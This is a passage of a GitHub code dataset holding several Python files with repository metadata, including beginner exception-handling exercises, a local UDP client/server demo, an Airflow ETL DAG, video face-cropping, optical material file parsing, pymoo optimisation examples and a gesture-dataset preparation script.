requests.get(url)\n return r.text\n\n\n#print(\"1#\", get_html(\"https://singlemalt.pl/\"))\n\n\"\"\"\nExercise 2\nWrite a function that take: random list, and the index, as a number. Function should return list element named \"index\".\nIf there is nothing like index, function should return None.\n\"\"\"\n\ndef get_index(list, index):\n try:\n return list[index]\n\n except IndexError:\n\n return None\n\nlist = [\"Rick\", \"Morty\", \"Summer\", \"Beth\", \"Jerry\"]\nprint(\"2#\", get_index(list, 0))\nprint(\"2#\", get_index(list, 5))\nprint(\"2#\", get_index(list, 1))\nprint(\"2#\", get_index(list, 9))\n\n\"\"\"\nExercise 3\nWrite a divide function that will take arguments a and b. Function should check if arguments are numbers, and take\ncare of zero divide error. Function should return result of division.\n\"\"\"\ndef safe_division(a,b):\n\n try:\n return a/b\n except ZeroDivisionError:\n return None\n except IndexError:\n return\n\nprint(\"3#\", safe_division(10,2))\n\n\n\n\"\"\"\nExercise 4\nWrite function that will take phone number. Function should check if number is on your list number (make one). If not\nFunction should return exception with \"no such number\" comment.\n\"\"\"\n\ndef phone_number(number):\n phone_list = [774896355, 990825630, 510836492, 276941862, 973245816]\n\n if number not in phone_list:\n raise Exception (\"No such number on the list\")\n\n return \"Cellar No\"\n\nprint(\"4#\", phone_number(990825630))\n\n\"\"\"\nExercise 5\nThere You have some simple riddle. 
Computer takes a random number between 1 and 10, and You have to guess it.\nAnalise code, and add exception methods.\n\"\"\"\n\nguessed = False\nrnd = randint(1, 10)\n\nwhile not guessed:\n str_num = input(\"Give me Your number:\")\n\n try:\n num = int(str_num)\n except ValueError:\n print(\"Number please!\")\n continue\n\n if num not in range(1, 11):\n print(\"number is between 1 and 10\")\n\n if num == rnd:\n print(\"You got it!\")\n guessed = True\n else:\n print(\"Try again\")\n\n\n\n\"\"\"\nExercise 6\nWrite a 'random average\" function that will get 'n' random numbers in range 1 - 100, sum them, and return average.\n\"\"\"\n\n\ndef random_average(n):\n sum = 0\n num = 0\n for i in range(0, n):\n sum += randint(1, 100)\n num += 1\n return sum / num\n\n\n#print(\"6#\", random_average(10))\n\n\"\"\"\nExercise 7\nWrite program, that will ask user to write 2 numbers, divise those numbers, and print final result.\nAlso secure Your code from possible errors.\n\"\"\"\n\ndef division_check():\n\n a = input(\"Enter number a: \")\n b = input(\"Enter number b: \")\n\n try:\n x = int(a)\n y = int(b)\n\n except ValueError:\n print(\"You need to put a number\")\n\n except ZeroDivisionError:\n print(\"You can't divise by zero\")\n\n return x / y\n\n\n#print(\"7#\", division_check())\n\n\n\"\"\"\nExercise 8\nWrite a function that will check validation of PESEL number. Function will take string as a value and return \nboolean value. PESEL contains 11 numbers. Last number is a control number. First 10 numbers should be multiple by\nfollowing numbers: `1 3 7 9 1 3 7 9 1 3`. Those numbers should be summed, then divided by 10 and finally minus\n10. If number You get will be equal to control number PESEL number is correct.\n\"\"\"\n\n\ndef validate_pesel(data):\n pesel = [int(i) for i in str(data)]\n wage = [1, 3, 7, 9, 1, 3, 7, 9, 1, 3]\n new_list = [pesel[i] * wage[i] for i in range(len(pesel) - 1)]\n\n result = 10 - (sum(new_list) % 10)\n\n if result == pesel[-1]:\n return True\n\n else:\n return False\n\n\nprint(\"8#\", validate_pesel(88042512499))\n", "repo_name": "PanMartinez/Bootcamp_Repeat", "sub_path": "01Basics/03env_and_imports.py", "file_name": "03env_and_imports.py", "file_ext": "py", "file_size_in_byte": 3917, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "3673946895", "text": "import socket\nimport logging\nimport time \nimport multiprocessing\nimport struct\nfrom typing import NamedTuple\n# https://www.pythonpool.com/struct-pack/\n# https://zetcode.com/python/namedtuple/\n\nlogging.basicConfig(format=\"[%(levelname)s] %(asctime)s %(message)s\", level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nclass MyData(NamedTuple):\n id: int\n age: bytes\n # name: str\n\n\n\ndef server():\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_socket.bind(('', 12000))\n\n while True:\n message, address = server_socket.recvfrom(1024)\n data = struct.unpack(\"IB\", message)\n data = MyData(*data)\n log.debug(f\"id: {data.id} age:{data.age}\")\n server_socket.sendto(b\"ack\", address)\n\n\ndef client():\n for pings in range(10):\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n client_socket.settimeout(1.0)\n data = MyData(pings, pings)\n data = 
struct.pack('IB', *data)\n \n message = data\n addr = (\"127.0.0.1\", 12000)\n\n start = time.time()\n client_socket.sendto(message, addr)\n try:\n data, server = client_socket.recvfrom(1024)\n end = time.time()\n elapsed = end - start\n log.debug(f'{data} {pings} {elapsed}')\n except socket.timeout:\n log.error('REQUEST TIMED OUT')\n \n\n \nif __name__ == \"__main__\":\n p_server = multiprocessing.Process(target=server)\n p_client = multiprocessing.Process(target=client)\n p_server.start()\n p_client.start()\n p_server.join()\n p_client.join()\n", "repo_name": "robobe/robobe.github.io", "sub_path": "examples/python/networking/udp/client_server.py", "file_name": "client_server.py", "file_ext": "py", "file_size_in_byte": 1611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 13, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 21, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 21, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 21, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 26, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 34, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 34, "usage_type": "attribute"}, {"api_name": "struct.pack", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "socket.timeout", "line_number": 49, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 55, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "7514812225", "text": "from utils.spark import SparkDefaults\nfrom operators.LoadOperator import LoadDShopOperator\nimport pathlib\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom operators.ExtractTableOperator import ExtractPGTable2HDFSOperator\nfrom operators.TransformTableOperator import TransformTableOperator\nfrom utils.creds import Credentials\n\n\n# Path to the directory where the out-of-stock data has to be stored/cached in json\nDATA_PATH_OOS_BRONZE = pathlib.Path(\"/bronze/dshop\")\n\n# Path to the directory where the out-of-stock data has to be stored/cached in parquet\nDATA_PATH_OOS_SILVER = pathlib.Path(\"/silver/dshop\")\n\nDEFAULT_ARGS = {\n 'owner': 'airflow'\n , 'email': ['airflow@airflow.com']\n , 'email_on_failure': False\n , 'retries': 2\n}\n\ndag = DAG(\n dag_id='dshop_dag_0_1_0'\n , description='Load data from `dshop` database to Bronze, clear and verify then put into the Silver. 
After all, load data to Gold Greenplum database.'\n , schedule_interval='@daily'\n , start_date=datetime(2021, 6, 2, 5) # <- load data each morning at 5 a.m.\n , default_args=DEFAULT_ARGS\n)\n\nextract_tasks = []\ntransform_tasks = []\ntable_names = [\n \"orders\", \"products\", \"departments\", \"aisles\"\n , \"clients\", \"stores\", \"store_types\", \"location_areas\"\n]\nwith dag:\n for table_name in table_names:\n extract_task = ExtractPGTable2HDFSOperator(\n task_id=f\"extract_dshop_bronze_{table_name}\"\n , provide_context=True\n , hdfs_conn_id=Credentials.DEFAULT_HDFS_CONN_ID\n , table_name=table_name\n , data_directory=DATA_PATH_OOS_BRONZE\n , db_conn_id=Credentials.DEFAULT_DB_CONN_ID\n )\n extract_tasks.append(extract_task)\n\n transform_task = TransformTableOperator(\n task_id=f\"transform_dshop_silver_{table_name}\"\n , provide_context=True\n , src_file_ext=\"csv\"\n , dst_file_ext=\"parquet\"\n , src_file_name=table_name\n , dst_file_name=table_name\n , hdfs_conn_id=Credentials.DEFAULT_HDFS_CONN_ID\n , src_path=DATA_PATH_OOS_BRONZE\n , dst_path=DATA_PATH_OOS_SILVER\n , spark_master=\"local\"\n , spark_app_name=\"transform_dshop_app\"\n )\n transform_tasks.append(transform_task)\n\n wait_extract_task = DummyOperator(\n task_id=\"wait_dshop_extraction_step\"\n )\n\n wait_transform_task = DummyOperator(\n task_id=\"wait_dshop_transform_step\"\n )\n\n load_task = LoadDShopOperator(\n task_id=\"load_dshop_gold\"\n , provide_context=True\n , dst_db_conn_id = Credentials.DEFAULT_CONN_GOLD_DB_ID\n , jdbc_driver_path = SparkDefaults.DEFAULT_SPARK_JDBC_DRIVER_PATH\n , src_path=DATA_PATH_OOS_SILVER\n , spark_master=\"local\"\n , spark_app_name=\"load_dshop_app\"\n )\n\nfor extract_task, transform_task in zip(extract_tasks, transform_tasks):\n extract_task >> wait_extract_task >> transform_task >> wait_transform_task >> load_task\n", "repo_name": "IevgenV/edu-robots-dataeng-project", "sub_path": "dags/dshop_dag.py", "file_name": "dshop_dag.py", "file_ext": "py", "file_size_in_byte": 3099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "airflow.DAG", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "operators.ExtractTableOperator.ExtractPGTable2HDFSOperator", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.creds.Credentials.DEFAULT_HDFS_CONN_ID", "line_number": 45, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.creds.Credentials.DEFAULT_DB_CONN_ID", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 48, "usage_type": "name"}, {"api_name": "operators.TransformTableOperator.TransformTableOperator", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.creds.Credentials.DEFAULT_HDFS_CONN_ID", "line_number": 59, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 59, "usage_type": "name"}, {"api_name": "airflow.operators.dummy_operator.DummyOperator", "line_number": 67, "usage_type": "call"}, {"api_name": "airflow.operators.dummy_operator.DummyOperator", "line_number": 71, "usage_type": "call"}, {"api_name": "operators.LoadOperator.LoadDShopOperator", "line_number": 75, "usage_type": "call"}, {"api_name": 
"utils.creds.Credentials.DEFAULT_CONN_GOLD_DB_ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.spark.SparkDefaults.DEFAULT_SPARK_JDBC_DRIVER_PATH", "line_number": 79, "usage_type": "attribute"}, {"api_name": "utils.spark.SparkDefaults", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "9166113", "text": "from detector import Detector, draw_boxes, count_file\nimport os\nimport cv2\n\nVIDEO_FOLDER_DIR = \"data/video/\"\nOUTPUT_FOLDER_DIR = \"/home/huycn/Documents/School/Python/data/cut_face/video_face/\"\n\ndef cut_images(img, boxes, path, name):\n name = name.split(\".\")[0]\n if type(boxes) == type(None):\n print(\"don't have any box to draw\")\n else:\n a = 0\n for box in boxes:\n box = [int(i) for i in box]\n [x1, y1, x2, y2] = box\n\n cut_img = img[y1:y2, x1:x2]\n\n img_dir = '{}/{}.{}.jpg'.format(OUTPUT_FOLDER_DIR, name, a)\n print(\"imwrite\", img_dir)\n\n \n os.makedirs(os.path.dirname(path), exist_ok=True)\n cv2.imwrite(img_dir, cut_img)\n a += 1\n\ndef main():\n list_video_dir = os.listdir(VIDEO_FOLDER_DIR)\n if len(list_video_dir) == 0:\n print(\"dont have any video in this dir\")\n return\n\n \n model = Detector('tinyface')\n for name in list_video_dir:\n video_dir = VIDEO_FOLDER_DIR + name\n print(video_dir)\n cap = cv2.VideoCapture(video_dir)\n i = 0\n while True:\n _, frame = cap.read()\n if i % 60 == 0:\n boxes, scores = model.detect(frame)\n \n cut_images(frame, boxes, OUTPUT_FOLDER_DIR + name.split('.')[0], str(i))\n i += 1\nif __name__ == \"__main__\":\n main() ", "repo_name": "Chau-Ngoc-Huy/crawl_data", "sub_path": "detect_face_video/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "detector.Detector", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "19426530296", "text": "from traits.api import *\nfrom traitsui.api import *\nimport numpy as np\nfrom basic_material import BasicMaterial\nfrom converter import SpectralConverter\nimport scipy.interpolate as scinterp\nimport os\nimport logging\nfrom pame.utils import complex_n_to_e\n\nclass MaterialFileError(Exception):\n \"\"\" \"\"\"\n\nclass ABCExternal(BasicMaterial):\n \"\"\" Base class for files and database linking (ie external) \"\"\"\n # These are all displayed on Adapter View (Original x values of file)\n xstart = Property(Float)\n xend = Property(Float)\n xpoints = Property(Int)\n file_spec_unit = Str() \n\n interpolation = Enum('linear',\n 'nearest', \n 'zero',\n 'slinear',\n 'quadratic', \n 'cubic')\n\n # Store the real data in the file; should be visualized on mview later\n file_x = Array() \n file_n = CArray() #Complex array nr, ni \n file_e = Property(CArray, depends_on='file_n')\n xps_in_nm = Array() #<-- x values in file in nanometers\n \n def _get_file_e(self):\n return complex_n_to_e(self.file_n)\n\n def _get_xstart(self):\n return self.file_x[0]\n \n def _get_xend(self):\n return self.file_x[-1]\n \n def 
_get_xpoints(self):\n return len(self.file_x)\n \n def _lambdas_changed(self):\n #update data only re-reads file, so don't need udpate_data()\n self.update_interp() \n \n def _interpolation_changed(self):\n self.update_interp()\n\n def _extrapolation_changed(self):\n self.update_interp()\n\n def update_interp(self):\n \"\"\"Interpolates complex arrays from file data and sets self.narray (real and imaginary),\n could also set dielectric function, since BasicMaterial updates when either is changed.\"\"\"\n nps = self.file_n\n xps = np.copy(self.xps_in_nm)\n \n # xps is always nm, so if goes large, small, reverse N's\n if xps[0] > xps[-1]:\n nps=nps[::-1] \n xps=xps[::-1] #Syntax to reverse an array \n\n # Spline interpolation. \n f = scinterp.interp1d(xps, nps, kind=self.interpolation, bounds_error=False) \n narray = f(self.lambdas)\n \n if self.extrapolation:\n #Only extrapolate if there are Nans. Mask by dropping Nans\n #And passing full x, dropped x and narray. Can't be complex,\n #even though spline interp can be...\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.interp.html \n if np.isnan(self.narray).any():\n xmask = self.lambdas[np.logical_not(np.isnan(narray))]\n nmask = narray[np.logical_not(np.isnan(narray))]\n n = np.interp(self.lambdas, xmask, nmask.real)#, left=0, right=0)\n k = np.interp(self.lambdas, xmask, nmask.imag)#, left=0, right=0)\n narray = n + 1j*k\n\n self.narray = narray\n\n def _xps_in_nm_default(self):\n \"\"\" Store file datapoints in nm (only need once assuming Nanometer\n unit system is used internally in PAME\n \"\"\"\n conv = SpectralConverter(input_array=self.file_x,\n input_units=self.file_spec_unit,\n output_units='Nanometers') \n return conv.output_array\n\n def update_data(self):\n \"\"\" Must set header, set file_x, set file_n and call updated_interp() \"\"\"\n pass\n \n\nclass ABCFile(ABCExternal):\n \"\"\" General model to store data from file. \n \n Notes\n -----\n In update_data(), readas file, sets header, sets n arrays, also stores original \n file wavelengths and other metdata.\n \n Metadata includes file id, \n name, header. 'file_path' must be set on instantiation!! \n \n Check out file Adapter for how files are stored without storing all their data.\n (basic_materials_adapter.ABCFileAdapter)\n \"\"\"\n \n source = 'File'\n file_path = File() \n short_name = Property(depends_on='file_path')\n file_id = Str() #Used to identify with methods below. For example, Sopra is \"Sopra\"\n file_extention = Str() #Again, not all files may have this\n header = Str() \n \n delimiter = None #If not none, will split on a certain character. Used for csv file\n #Otherwise, default split()/genfromtxt will split on all whitespace\n \n def _file_path_changed(self):\n \"\"\" THIS HANDLES MAIN EVENT! \n 1. Read file Data \n 3. Interpolate\n \"\"\"\n self.update_data()\n self.update_interp() \n \n #def _file_spec_unit_changed(self):\n #raise MaterialFileError('Design choice to disallow changing of file_spec_unit')\n ## This shouldn't happen\n ## self.update_interp()\n \n def _get_short_name(self):\n return os.path.basename(self.file_path)\n \n def update_data(self):\n \"\"\" Must set header, set file_x, set file_n and call updated_interp() \"\"\"\n pass\n \n\nclass XNKFile(ABCFile):\n \"\"\"3-coloumns header: lambdas, N, K as arrays.\"\"\"\n fileid='xnk'\n delimiter = None\n # file_extension='.txt' #not used/clear\n\n def update_data(self):\n \"\"\" File must have a header of from (specunit, N, K). From header, \n specunit is set. 
N and K are read into arrays. \n \"\"\"\n with open(self.file_path, 'r') as f:\n self.header = f.readline().lstrip('#').strip()\n \n \n try:\n self.file_x, n, k = np.genfromtxt(self.file_path, \n unpack=True, \n skip_header=1,\n delimiter=self.delimiter)\n except Exception as exc:\n raise MaterialFileError(r'Could not read %s with np.genfromtxt'\n ' Make sure it is three column, with single header of form'\n ' (specunit, N, K). TracebacK:\\n\\n%s' %\n (self.short_name, exc) )\n \n \n else: \n self.file_n = n + 1j*k\n\n # Set default unit from header[0]\n self.file_spec_unit = self.header.split(self.delimiter)[0]\n\n\n traits_view=View(Item('header', style='readonly'),\n Item('mviewbutton', show_label=False, label='Show Material'),\n Item('file_path', style='readonly') )\n \n\nclass XNKFileCSV(XNKFile):\n \"\"\" Wavelength, N, K delimited, 3-column file but comma-separated.\"\"\"\n fileid='xnk_csv'\n delimiter = ','\n file_extension='.csv' \n \n\nclass SopraFile(ABCFile): \n\n file_id='Sopra'\n file_extension='.nk'\n\n traits_view=View( \n Item('mviewbutton', label='Show Material', show_label=False),\n Item('file_path', editor=FileEditor() ) ,\n Item('header' ),\n HGroup(\n Item('xstart', style='readonly') ,\n Item('xend', style='readonly'),\n Item('xpoints', style='readonly'),\n ),\n Item('file_spec_unit', label='File spectral unit', style='readonly'), \n Item('x_unit', style='readonly', label='Current spectral unit'),\n resizable=True, buttons=['Undo']\n )\n\n\n def update_data(self):\n\n with open(self.file_path, 'r') as f:\n self.header = f.readline().lstrip('#').strip() \n \n # Parse SOPRA header (ALLOW FOR COMMA OR MATDELIM cuz comma is common) \n headerlist = self.header.split(self.delimiter)\n\n code = int(headerlist[0])\n xstart = float(headerlist[1])\n xend = float(headerlist[2])\n xpoints = int(headerlist[3])\n\n self.file_x = np.linspace(xstart, xend, xpoints+1) #<< +1?\n\n # Set specunit ...\n if code==1:\n self.file_spec_unit='eV'\n \n elif code==2:\n self.file_spec_unit='Micrometers'\n\n elif code==3:\n self.file_spec_unit='cm-1' #Inverse centimeters\t\n\n elif code==4:\n self.file_spec_unit='Nanometers'\n else:\n raise MaterialFileError('Sopra specunit code must be 1,2,3 or 4. 
Got: %s' % code)\n\n # Populate arrays (2 column)\n n, k = np.genfromtxt(self.file_path, \n unpack=True,\n skip_header=1)\n \n self.file_n = n + 1j*k\n", "repo_name": "hughesadam87/PAME", "sub_path": "pame/material_files.py", "file_name": "material_files.py", "file_ext": "py", "file_size_in_byte": 8432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "basic_material.BasicMaterial", "line_number": 14, "usage_type": "name"}, {"api_name": "pame.utils.complex_n_to_e", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 81, "usage_type": "call"}, {"api_name": "converter.SpectralConverter", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "73954657128", "text": "# Test matrix file - load in the matrix jsons and send a request to \n# the matrix adder\nimport json\nimport requests\n\ndef test_matrix_multiplier():\n\n # import the matrix files\n with open(\"test/matrix_a.json\") as f:\n matrix_a = json.load(f)\n with open(\"test/matrix_b.json\") as f:\n matrix_b = json.load(f)\n\n # set up the request\n j_request = []\n j_request.append(matrix_a)\n j_request.append(matrix_b)\n \n # send matrixes\n r = requests.get('http://127.0.0.1:8072/multi', data=json.dumps(j_request))\n \n # assert the response\n print(f\"The response is {r.text}\")\n assert(r.status_code == 200)\n assert(int(r.text) == 96)", "repo_name": "baviddak/go-matrix", "sub_path": "test/test_matrix.py", "file_name": "test_matrix.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "9354710350", "text": "# START ctaea\nfrom pymoo.algorithms.ctaea import CTAEA\nfrom pymoo.factory import get_problem, get_reference_directions\nfrom pymoo.optimize import minimize\nfrom pymoo.visualization.scatter import Scatter\n\nproblem = get_problem(\"DASCMOP1\", 2)\n\n# create the reference directions to be used for the optimization\nref_dirs = get_reference_directions(\"das-dennis\", problem.n_obj, n_points=91)\n\n# create the algorithm object\nalgorithm = CTAEA(ref_dirs=ref_dirs)\n\n# execute the optimization\nres = 
minimize(problem,\n algorithm,\n ('n_gen', 600),\n seed=1,\n verbose=True\n )\n\nplot = Scatter()\nplot.add(problem.pareto_front(), plot_type=\"line\", color=\"black\", alpha=0.7)\nplot.add(res.F, color=\"red\")\nplot.show()\n# END ctaea\n\n# START carside\nproblem = get_problem(\"carside\")\nref_dirs = get_reference_directions(\"das-dennis\", problem.n_obj, n_points=91)\nalgorithm = CTAEA(ref_dirs=ref_dirs)\n\nres = minimize(problem,\n algorithm,\n ('n_gen', 600),\n seed=1,\n verbose=True\n )\n\nScatter().add(res.F).show()\n# END carside\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/usage/algorithms/usage_ctaea.py", "file_name": "usage_ctaea.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymoo.factory.get_problem", "line_number": 7, "usage_type": "call"}, {"api_name": "pymoo.factory.get_reference_directions", "line_number": 10, "usage_type": "call"}, {"api_name": "pymoo.algorithms.ctaea.CTAEA", "line_number": 13, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.visualization.scatter.Scatter", "line_number": 23, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 30, "usage_type": "call"}, {"api_name": "pymoo.factory.get_reference_directions", "line_number": 31, "usage_type": "call"}, {"api_name": "pymoo.algorithms.ctaea.CTAEA", "line_number": 32, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 34, "usage_type": "call"}, {"api_name": "pymoo.visualization.scatter.Scatter", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "13080379178", "text": "#%%\nimport json\nimport pandas as pd\nimport os\nimport glob\nfrom subprocess import call\n\ndef load_labels(label_csv_path):\n data = pd.read_csv(label_csv_path, delimiter=' ', header=None)\n labels = []\n for i in range(data.shape[0]):\n labels.append(data.ix[i, 1])\n return labels\n\n\ndef convert_csv_to_dict(csv_path, subset, labels):\n try:\n data = pd.read_csv(csv_path, delimiter=' ', header=None)\n except pd.errors.EmptyDataError:\n return {}\n\n keys = []\n key_labels = []\n for i in range(data.shape[0]):\n row = data.ix[i, :]\n class_name = labels[row[1] - 1]\n basename = str(row[0])\n \n keys.append(basename)\n key_labels.append(class_name)\n \n database = {}\n for i in range(len(keys)):\n key = keys[i]\n database[key] = {}\n database[key]['subset'] = subset\n label = key_labels[i]\n database[key]['annotations'] = {'label': label}\n \n return database\n\ndef convert_jester_csv_to_activitynet_json(label_csv_path, train_csv_path, test_csv_path, dst_json_path):\n labels = load_labels(label_csv_path)\n if train_csv_path:\n train_database = convert_csv_to_dict(train_csv_path, 'training', labels)\n else:\n train_database = {}\n test_database = convert_csv_to_dict(test_csv_path, 'testing', labels)\n \n dst_data = {}\n dst_data['labels'] = labels\n dst_data['database'] = {}\n dst_data['database'].update(train_database)\n dst_data['database'].update(test_database)\n\n with open(dst_json_path, 'w') as dst_file:\n json.dump(dst_data, dst_file)\n\n#%%\ndef prepare_json(csv_dir_path='./annotation_ems', expr_name='15.3'):\n \"\"\" Convert training & testing list into a single json file.\n\n Parameters\n ----------\n csv_dir_path: the path to training/testing list; the output json file will also be saved into the same directory.\n expr_name: expriment name.\n \"\"\"\n 
label_csv_path = os.path.join(csv_dir_path, 'classInd%s.txt' % expr_name)\n train_csv_path = os.path.join(csv_dir_path, 'trainlist%s.txt' % expr_name)\n test_csv_path = os.path.join(csv_dir_path, 'testlist%s.txt' % expr_name)\n dst_json_path = os.path.join(csv_dir_path, 'ems%s.json' % expr_name)\n\n convert_jester_csv_to_activitynet_json(\n label_csv_path, train_csv_path, test_csv_path, dst_json_path)\n\ndef split(video_path, annot_path, fps=30, delay=4/30, duration=10/30):\n \"\"\" Split a single video file into multiple clips based on annotation.\n\n Parameters\n ----------\n fps: frame rate\n delay: how many seconds it take for bootstrap\n duration: the length for each clip, in second(s)\n\n \"\"\"\n directory = video_path.split(\".\")[0] + \"_all\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n call([\"ffmpeg\", \"-i\", video_path, os.path.join(directory, \"%05d.jpg\"), \"-hide_banner\"])\n\n with open(annot_path, 'r') as f:\n annot = f.readlines()\n\n annot = [a for a in annot[0::2]]\n ges_cnt = {}\n\n for j, a in enumerate(annot[:]):\n ges = a.split('start')[0]\n ges = '_'.join(ges.lower().strip().split(' '))\n # ges = 'human_' + ges\n\n t = a.split('start:')[-1].strip()\n t = float(t)\n\n start = int((t + delay) * fps)\n end = int((t + delay + duration) * fps)\n\n cnt = ges_cnt.get(ges, 0) + 1\n ges_cnt[ges] = cnt\n output_dir = os.path.join(video_path.split('/'), '{:03d}_{}_{:02d}_all'.format(j, ges, cnt))\n os.makedirs(output_dir, exist_ok=True)\n for i in range(start, end):\n os.system('cp {}/{:05d}.jpg {}'.format(directory, i, output_dir))\n\n d = sorted(glob.glob('%s/*' % output_dir))\n\n for i in range(len(d)):\n f = '%05d.jpg' % (i+1)\n d2 = output_dir + '/' + f\n os.system('mv %s %s' % (d[i], d2))", "repo_name": "0x10cxR1/Real-time-GesRec", "sub_path": "ems_prepare.py", "file_name": "ems_prepare.py", "file_ext": "py", "file_size_in_byte": 3870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.errors", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 111, "usage_type": 